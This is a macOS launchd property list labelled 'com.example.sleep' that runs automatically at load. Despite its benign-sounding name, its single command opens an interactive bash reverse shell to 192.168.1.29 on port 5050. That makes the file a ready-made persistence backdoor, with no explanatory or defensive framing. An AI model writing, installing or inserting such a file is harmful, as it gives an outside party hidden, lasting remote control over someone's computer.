<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">

<plist version="1.0">

<dict>

    <key>Label</key>

    <string>com.example.sleep</string>

    <key>ProgramArguments</key>

    <array>

        <string>bash</string>

        <string>-c</string>

	    <string>/bin/bash -i &gt;&amp; /dev/tcp/192.168.1.29/5050 0&gt;&amp;1</string>

    </array>

    <key>RunAtLoad</key>

    <true/>

</dict>

</plist>
